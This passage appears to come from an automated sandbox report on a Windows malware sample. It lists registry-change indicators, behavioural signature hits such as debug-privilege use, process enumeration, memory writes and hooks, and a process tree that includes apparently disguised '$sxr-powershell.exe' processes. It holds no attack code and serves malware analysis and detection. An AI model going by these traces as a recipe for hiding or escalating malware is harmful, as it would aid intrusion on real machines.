  Key created | DEF\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
  Set value (data) | CACHED\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003135514da75cdb01 | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-103 = "Microsoft Excel Macro-Enabled Worksheet" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff | SearchProtocolHost.exe
  Set value (str) | MUI\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut" | SearchProtocolHost.exe
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
  Key created | DEF\Software | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows | SearchProtocolHost.exe
  Set value (str) | MUI\@OFFICE16\oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template" | SearchProtocolHost.exe
  Key created | DEF\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht\OpenWithList | SearchProtocolHost.exe

Every writer in this table is a Windows Search host (SearchIndexer.exe, SearchProtocolHost.exe, SearchFilterHost.exe), Office Click-to-Run or a service host; none of the sample's processes appear, so for this run the signature records background activity rather than sample behaviour.
Modifies registry class (64 IoCs)
  Abbreviation used in this table: SHELL = \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell
  description | ioc | Process
  Set value (str) | SHELL\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Explorer.EXE
  Set value (int) | SHELL\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Explorer.EXE
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
  Set value (data) | SHELL\BagMRU\0\MRUListEx = 0000000001000000ffffffff | Explorer.EXE
  Set value (str) | SHELL\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Explorer.EXE
  Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | msedge.exe
  Set value (data) | SHELL\BagMRU\NodeSlots = 020202 | Explorer.EXE
  Key created | SHELL\BagMRU\0\1\0 | Explorer.EXE
  Key created | SHELL\BagMRU\2 | Explorer.EXE
  Set value (int) | SHELL\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Mode = "8" | Explorer.EXE
  Set value (int) | SHELL\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | Explorer.EXE
  Key created | SHELL\BagMRU\0\0\0 | Explorer.EXE
  Set value (int) | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | Explorer.EXE
  Key created | SHELL\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943} | Explorer.EXE
  Key created | SHELL\Bags\4 | Explorer.EXE
  Set value (int) | SHELL\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\2 = (value not preserved in this page extract) | Explorer.EXE
  Set value (data) | SHELL\BagMRU\2\MRUListEx = ffffffff | Explorer.EXE
  Set value (data) | SHELL\BagMRU\0\0\MRUListEx = 0000000001000000ffffffff | Explorer.EXE
  Set value (int) | SHELL\BagMRU\0\1\NodeSlot = "5" | Explorer.EXE
  Set value (str) | SHELL\Bags\8\Shell\SniffedFolderType = "Generic" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\NodeSlots = 020202020202020202 | Explorer.EXE
  Set value (int) | SHELL\BagMRU\0\0\NodeSlot = "7" | Explorer.EXE
  Set value (str) | SHELL\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | Explorer.EXE
  Set value (int) | SHELL\BagMRU\1\NodeSlot = "9" | Explorer.EXE
  Key created | SHELL\Bags\9 | Explorer.EXE
  Set value (int) | SHELL\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\NodeSlots = 0202020202 | Explorer.EXE
  Set value (data) | SHELL\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | Explorer.EXE
  Set value (data) | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | Explorer.EXE
  Set value (int) | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | Explorer.EXE
  Set value (int) | SHELL\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\0\MRUListEx = 0100000000000000ffffffff | Explorer.EXE
  Set value (str) | SHELL\Bags\7\Shell\SniffedFolderType = "Generic" | Explorer.EXE
  Key created | SHELL\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | Explorer.EXE
  Key created | SHELL\Bags\7 | Explorer.EXE
  Set value (int) | SHELL\Bags\10\Shell\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByDirection = "1" | Explorer.EXE
  Key created | SHELL\BagMRU\0\1\0\0 | Explorer.EXE
  Set value (int) | SHELL\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | Explorer.EXE
  Key created | SHELL\Bags\2\Shell | Explorer.EXE
  Set value (int) | SHELL\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Explorer.EXE
  Set value (str) | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | Explorer.EXE
  Set value (int) | SHELL\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" | Explorer.EXE
  Set value (int) | SHELL\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\NodeSlots = 02020202 | Explorer.EXE
  Set value (data) | SHELL\Bags\4\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000 | Explorer.EXE
  Set value (int) | SHELL\Bags\4\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" | Explorer.EXE
  Set value (str) | SHELL\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | Explorer.EXE
  Set value (int) | SHELL\Bags\5\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | Explorer.EXE
  Set value (str) | SHELL\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | Explorer.EXE
  Set value (int) | SHELL\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Explorer.EXE
  Set value (int) | SHELL\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\0\1\0\0\0 = 4a00310000000000215a5dbd1000696d6700380009000400efbe215a5dbd215a5dbd2e000000d03d0200000007000000000000000000000000000000c12c710069006d006700000012000000 | Explorer.EXE
  Set value (str) | SHELL\Bags\4\Shell\SniffedFolderType = "Generic" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\0\0\1 = 5600310000000000215a6ebd100057696e646f777300400009000400efbe874f7748215a6ebd2e00000000060000000001000000000000000000000000000000d409ba00570069006e0064006f0077007300000016000000 | Explorer.EXE
  Set value (data) | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | Explorer.EXE
  Set value (int) | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | Explorer.EXE
  Set value (data) | SHELL\BagMRU\NodeSlots = 02020202020202 | Explorer.EXE
  Key created | SHELL\Bags\9\Shell | Explorer.EXE
  Key created | SHELL\Bags\5\Shell | Explorer.EXE
  Key created | SHELL\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | Explorer.EXE
  Set value (int) | SHELL\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | Explorer.EXE
  Set value (int) | SHELL\Bags\4\Shell\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3" | Explorer.EXE
  Key created | SHELL\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | Explorer.EXE

Every row but one is Explorer.EXE writing ShellBag and BagMRU folder-view state (the exception is msedge.exe creating its Local Settings key); no sample process appears, so this signature is background noise for this run.
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process
6056 PING.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process
3524 Explorer.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
4556 msedge.exe
4556 msedge.exe
3228 msedge.exe
3228 msedge.exe
2140 identity_helper.exe
2140 identity_helper.exe
1340 msedge.exe
1340 msedge.exe
700 build.bat.exe
700 build.bat.exe
700 build.bat.exe
700 build.bat.exe
2744 dllhost.exe
2744 dllhost.exe
2744 dllhost.exe
2744 dllhost.exe
700 build.bat.exe
700 build.bat.exe
2396 $sxr-powershell.exe
2396 $sxr-powershell.exe
2396 $sxr-powershell.exe
2396 $sxr-powershell.exe
2396 $sxr-powershell.exe
4648 dllhost.exe
4648 dllhost.exe
4648 dllhost.exe
4648 dllhost.exe
2396 $sxr-powershell.exe
2396 $sxr-powershell.exe
3832 $sxr-powershell.exe
3832 $sxr-powershell.exe
3832 $sxr-powershell.exe
2396 $sxr-powershell.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
3832 $sxr-powershell.exe
3832 $sxr-powershell.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
2408 dllhost.exe
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process
3524 Explorer.EXE
2684 taskhostw.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs
pid Process
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: 33 2792 AUDIODG.EXE
Token: SeIncBasePriorityPrivilege 2792 AUDIODG.EXE
Token: SeDebugPrivilege 700 build.bat.exe
Token: SeDebugPrivilege 700 build.bat.exe
Token: SeDebugPrivilege 2744 dllhost.exe
Token: SeDebugPrivilege 2396 $sxr-powershell.exe
Token: SeDebugPrivilege 2396 $sxr-powershell.exe
Token: SeDebugPrivilege 4648 dllhost.exe
Token: SeDebugPrivilege 3832 $sxr-powershell.exe
Token: SeDebugPrivilege 2396 $sxr-powershell.exe
Token: SeDebugPrivilege 2408 dllhost.exe
Token: SeShutdownPrivilege 3524 Explorer.EXE
Token: SeCreatePagefilePrivilege 3524 Explorer.EXE
Token: SeDebugPrivilege 700 build.bat.exe
Token: SeDebugPrivilege 5716 dllhost.exe
Token: SeDebugPrivilege 700 build.bat.exe
Token: SeDebugPrivilege 5456 dllhost.exe
Token: SeShutdownPrivilege 384 dwm.exe
Token: SeCreatePagefilePrivilege 384 dwm.exe
Token: SeDebugPrivilege 5672 taskkill.exe
Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe
Token: SeIncreaseQuotaPrivilege 2296 svchost.exe
Token: SeSecurityPrivilege 2296 svchost.exe
Token: SeTakeOwnershipPrivilege 2296 svchost.exe
Token: SeLoadDriverPrivilege 2296 svchost.exe
Token: SeSystemtimePrivilege 2296 svchost.exe
Token: SeBackupPrivilege 2296 svchost.exe
Token: SeRestorePrivilege 2296 svchost.exe
Token: SeShutdownPrivilege 2296 svchost.exe
Token: SeSystemEnvironmentPrivilege 2296 svchost.exe
Token: SeUndockPrivilege 2296 svchost.exe
Token: SeManageVolumePrivilege 2296 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe
Token: SeIncreaseQuotaPrivilege 2296 svchost.exe
Token: SeSecurityPrivilege 2296 svchost.exe
Token: SeTakeOwnershipPrivilege 2296 svchost.exe
Token: SeLoadDriverPrivilege 2296 svchost.exe
Token: SeSystemtimePrivilege 2296 svchost.exe
Token: SeBackupPrivilege 2296 svchost.exe
Token: SeRestorePrivilege 2296 svchost.exe
Token: SeShutdownPrivilege 2296 svchost.exe
Token: SeSystemEnvironmentPrivilege 2296 svchost.exe
Token: SeUndockPrivilege 2296 svchost.exe
Token: SeManageVolumePrivilege 2296 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe
Token: SeIncreaseQuotaPrivilege 2296 svchost.exe
Token: SeSecurityPrivilege 2296 svchost.exe
Token: SeTakeOwnershipPrivilege 2296 svchost.exe
Token: SeLoadDriverPrivilege 2296 svchost.exe
Token: SeSystemtimePrivilege 2296 svchost.exe
Token: SeBackupPrivilege 2296 svchost.exe
Token: SeRestorePrivilege 2296 svchost.exe
Token: SeShutdownPrivilege 2296 svchost.exe
Token: SeSystemEnvironmentPrivilege 2296 svchost.exe
Token: SeUndockPrivilege 2296 svchost.exe
Token: SeManageVolumePrivilege 2296 svchost.exe
Token: SeAssignPrimaryTokenPrivilege 2296 svchost.exe
Token: SeIncreaseQuotaPrivilege 2296 svchost.exe
Token: SeSecurityPrivilege 2296 svchost.exe
Token: SeTakeOwnershipPrivilege 2296 svchost.exe
Token: SeLoadDriverPrivilege 2296 svchost.exe
Token: SeSystemtimePrivilege 2296 svchost.exe
Token: SeBackupPrivilege 2296 svchost.exe
Token: SeRestorePrivilege 2296 svchost.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
5392 Conhost.exe
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
-
Suspicious use of SendNotifyMessage 31 IoCs
pid Process
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3228 msedge.exe
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
-
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process
2396 $sxr-powershell.exe
4988 Conhost.exe
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
3524 Explorer.EXE
6052 $sxr-powershell.exe
3524 Explorer.EXE
3524 Explorer.EXE
6440 Conhost.exe
-
Suspicious use of UnmapMainImage 2 IoCs
pid Process
4772 RuntimeBroker.exe
2432 sihost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 3228 wrote to memory of 3360 3228 msedge.exe 83
PID 3228 wrote to memory of 3360 3228 msedge.exe 83
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 3184 3228 msedge.exe 84
PID 3228 wrote to memory of 4556 3228 msedge.exe 85
PID 3228 wrote to memory of 4556 3228 msedge.exe 85
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
PID 3228 wrote to memory of 3576 3228 msedge.exe 86
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process
5312 attrib.exe
Processes
(process tree: image path | command line | PID; children are indented under their parent, signature hits listed beneath each process)

C:\Windows\system32\winlogon.exe | winlogon.exe | PID:612
  C:\Windows\system32\dwm.exe | "dwm.exe" | PID:384
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{d2e7add7-8eb9-46a9-acba-dd5e63b79d3d} | PID:2744
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{2ade88b5-a55b-4c92-9049-7f098d3d7727} | PID:4648
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{c17b99c2-c5db-4b2e-ade3-e028a00c6ebe} | PID:2408
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{6b2379f7-90c5-4a4c-a11c-7d88ff936807} | PID:5716
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{5434d742-5ad2-4677-8595-651fdd6d9b08} | PID:5456
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{90ebcc79-eff1-4f87-9f58-a2cd36be45ff} | PID:5416
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{90821822-cf5c-4156-8fd8-8cadc68d76c0} | PID:2716
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{d4e754eb-dc2a-40fe-8e21-a161b2111196} | PID:5356
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{f7b8f8fe-0617-4a1e-8f4f-6ee340f97622} | PID:432
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{004f97d3-0889-4e45-a248-c7c65908f52a} | PID:5736
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID:676
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID:960
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID:376
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID:692
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID:864
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID:1032
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID:1144
  - Drops file in System32 directory
  C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID:2684
    - Suspicious behavior: GetForegroundWindowSpam
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | PID:1188
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | PID:1252
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | PID:1264
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | PID:1344
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | PID:1360
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | PID:1368
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | PID:1504
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | PID:1556
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | PID:1564
  C:\Windows\system32\sihost.exe | sihost.exe | PID:2432
    - Suspicious use of UnmapMainImage
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | PID:1668
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | PID:1676
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | PID:1772
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:1788
  - Modifies Internet Explorer settings
  C:\Windows\system32\AUDIODG.EXE | C:\Windows\system32\AUDIODG.EXE 0x424 0x4c8 | PID:2792
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | PID:1936
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:1944
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | PID:2000
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | PID:2008
C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID:1716
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | PID:2184
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | PID:2196
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | PID:2296
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID:2424
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | PID:2452
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | PID:2460
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | PID:2668
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | PID:2756
C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | PID:2772
